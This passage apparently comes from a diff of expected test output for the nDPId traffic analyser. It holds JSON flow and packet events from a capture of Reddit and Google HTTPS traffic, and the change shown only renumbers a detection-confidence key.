-01269{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":27,"source":"reddit.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1605291684452,"flow_last_seen":1605291684551,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":457,"midstream":0,"thread_ts_msec":1605291684551,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56558,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.reddit.com","server_names":"reddit.com,*.reddit.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, 
CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.reddit.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"DB:E9:D5:FE:EB:EF:68:34:55:FD:62:BA:C9:BB:04:D4:E3:22:18:81"}} -01009{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":29,"source":"reddit.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291684451,"flow_last_seen":1605291684551,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291684551,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200a","src_port":40030,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"safebrowsing.googleapis.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00944{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":39,"source":"reddit.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291684481,"flow_last_seen":1605291684552,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291684552,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56560,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"www.reddit.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01000{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":56,"source":"reddit.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291684481,"flow_last_seen":1605291684592,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605291684592,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56560,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.reddit.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01270{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":63,"source":"reddit.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605291684481,"flow_last_seen":1605291684593,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":366,"midstream":0,"thread_ts_msec":1605291684593,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56560,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"www.reddit.com","server_names":"reddit.com,*.reddit.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.reddit.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"DB:E9:D5:FE:EB:EF:68:34:55:FD:62:BA:C9:BB:04:D4:E3:22:18:81"}} +01000{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":25,"source":"reddit.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291684452,"flow_last_seen":1605291684551,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605291684551,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56558,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.reddit.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+01269{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":27,"source":"reddit.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1605291684452,"flow_last_seen":1605291684551,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":457,"midstream":0,"thread_ts_msec":1605291684551,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56558,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.reddit.com","server_names":"reddit.com,*.reddit.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.reddit.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"DB:E9:D5:FE:EB:EF:68:34:55:FD:62:BA:C9:BB:04:D4:E3:22:18:81"}} +01009{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":29,"source":"reddit.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291684451,"flow_last_seen":1605291684551,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291684551,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200a","src_port":40030,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.3","client_requested_server_name":"safebrowsing.googleapis.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00944{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":39,"source":"reddit.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291684481,"flow_last_seen":1605291684552,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291684552,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56560,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.reddit.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01000{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":56,"source":"reddit.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291684481,"flow_last_seen":1605291684592,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605291684592,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56560,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"www.reddit.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01270{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":63,"source":"reddit.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605291684481,"flow_last_seen":1605291684593,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":366,"midstream":0,"thread_ts_msec":1605291684593,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56560,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.reddit.com","server_names":"reddit.com,*.reddit.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.reddit.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"DB:E9:D5:FE:EB:EF:68:34:55:FD:62:BA:C9:BB:04:D4:E3:22:18:81"}} 
00608{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":279,"source":"reddit.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291686035,"flow_last_seen":1605291686035,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291686035,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56562,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":279,"source":"reddit.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1605291686035,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686035,"pkt":"qtsDr8lk5EKm5WPyht1gDzZzACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3PIBu+DxzH8AAAAAoAL9INmFAAACBAWgBAIICql05ecAAAAAAQMDBw=="} 00608{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":280,"source":"reddit.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291686035,"flow_last_seen":1605291686035,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291686035,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56564,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
@@ -58,20 +58,20 @@ 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":426,"source":"reddit.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1605291686065,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686065,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvc8oSMMqHg8cyAoBJXgMyZAAACBAV4AQMDAwQCCArC1ziiqXTl5w=="} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":427,"source":"reddit.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1605291686065,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291686065,"pkt":"qtsDr8lk5EKm5WPyht1gCjLcACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3PQBu\/EwLy+VrQrRgBAB+\/RNAAABAQgKqXTmBcLXOKI="} 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":428,"source":"reddit.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1605291686065,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291686065,"pkt":"qtsDr8lk5EKm5WPyht1gDzZzACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3PIBu+DxzICEjDKigBAB+1CNAAABAQgKqXTmBcLXOKI="} 
-00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":429,"source":"reddit.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686035,"flow_last_seen":1605291686065,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686065,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56564,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":430,"source":"reddit.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686035,"flow_last_seen":1605291686065,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686065,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56562,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":429,"source":"reddit.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686035,"flow_last_seen":1605291686065,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686065,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56564,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":430,"source":"reddit.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686035,"flow_last_seen":1605291686065,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686065,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56562,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":431,"source":"reddit.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1605291686071,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686071,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvc+p6YTHT6uGMsoBJXgOg4AAACBAV4AQMDAwQCCArC1zipqXTl5w=="} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":432,"source":"reddit.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1605291686071,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686071,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvc+BQBJhBwR01MoBJXgDmIAAACBAV4AQMDAwQCCArC1zipqXTl5w=="} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":433,"source":"reddit.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1605291686071,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686071,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvc9o6MJX7sl7kLoBJXgNeBAAACBAV4AQMDAwQCCArC1zioqXTl5w=="} 
00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":434,"source":"reddit.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1605291686071,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291686071,"pkt":"qtsDr8lk5EKm5WPyht1gB\/ybACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3PoBu\/q4YyyemEx1gBAB+2wmAAABAQgKqXTmC8LXOKk="} 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":435,"source":"reddit.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1605291686071,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291686071,"pkt":"qtsDr8lk5EKm5WPyht1gCVbzACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3PgBu3BHTUwUASYRgBAB+711AAABAQgKqXTmC8LXOKk="} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":436,"source":"reddit.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1605291686071,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291686071,"pkt":"qtsDr8lk5EKm5WPyht1gAChDACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3PYBu+yXuQuOjCV\/gBAB+1tvAAABAQgKqXTmC8LXOKg="} 
-00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":437,"source":"reddit.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686035,"flow_last_seen":1605291686071,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686071,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56570,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":438,"source":"reddit.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686035,"flow_last_seen":1605291686071,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686071,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56568,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":439,"source":"reddit.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686035,"flow_last_seen":1605291686071,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686071,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56566,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 